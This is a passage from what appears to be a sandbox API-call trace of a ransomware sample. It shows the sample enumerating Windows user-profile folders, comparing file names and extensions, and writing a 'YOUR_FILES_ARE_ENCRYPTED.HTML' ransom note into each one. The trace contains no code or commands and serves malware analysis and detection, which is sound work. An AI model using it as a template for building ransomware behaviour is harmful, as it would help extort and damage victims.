(hObject=0x5a0) returned 1 [0171.217] GetProcessHeap () returned 0x270000 [0171.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175c6d1c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175c6d1c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175c6d1c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0171.218] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0171.218] GetProcessHeap () returned 0x270000 [0171.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.218] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0171.218] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\Application Data\\*" [0171.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.218] GetProcessHeap () returned 0x270000 [0171.219] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.220] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Contacts", cAlternateFileName="")) returned 1 [0171.220] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0171.220] GetProcessHeap () returned 0x270000 [0171.220] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.220] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts") returned="\\\\?\\C:\\Users\\Default\\Contacts" [0171.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*" [0171.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8143b5e9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0171.221] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0171.221] lstrcmpW (lpString1="Administrator.contact", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.221] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0171.221] lstrlenW (lpString=".contact") returned 8 [0171.221] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.221] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0171.221] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.221] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.222] lstrlenW (lpString=".ini") returned 4 [0171.222] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.222] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.222] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.222] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\contacts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.224] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.226] CloseHandle (hObject=0x5a0) returned 1 [0171.227] GetProcessHeap () returned 0x270000 [0171.228] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.228] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Cookies", cAlternateFileName="")) returned 1 [0171.228] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0171.228] GetProcessHeap () returned 0x270000 [0171.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.228] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0171.228] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned="\\\\?\\C:\\Users\\Default\\Cookies\\*" [0171.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.228] GetProcessHeap () returned 0x270000 [0171.230] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.230] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0171.230] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0171.230] GetProcessHeap () returned 0x270000 [0171.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.230] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0171.230] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*" [0171.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.230] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.231] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.231] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0171.231] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.231] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.231] lstrlenW (lpString=".ini") returned 4 [0171.231] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.231] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.231] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.231] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.232] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.234] CloseHandle (hObject=0x5a0) returned 1 [0171.235] GetProcessHeap () returned 0x270000 [0171.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.236] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0171.236] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0171.236] GetProcessHeap () returned 0x270000 [0171.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.236] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0171.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*" [0171.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f4ea6f, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.238] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0171.238] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.238] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.238] lstrlenW (lpString=".ini") returned 4 [0171.238] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0171.238] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0171.238] GetProcessHeap () returned 0x270000 [0171.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.238] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0171.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*" [0171.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.239] GetProcessHeap () returned 0x270000 [0171.240] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.240] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0171.240] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0171.240] GetProcessHeap () returned 0x270000 [0171.240] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.240] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0171.240] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*" [0171.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.240] GetProcessHeap () returned 0x270000 [0171.240] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.240] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0171.241] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0171.241] GetProcessHeap () returned 0x270000 [0171.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.241] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0171.241] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*" [0171.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.241] GetProcessHeap () returned 0x270000 [0171.241] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.241] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0171.241] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.243] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.246] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, 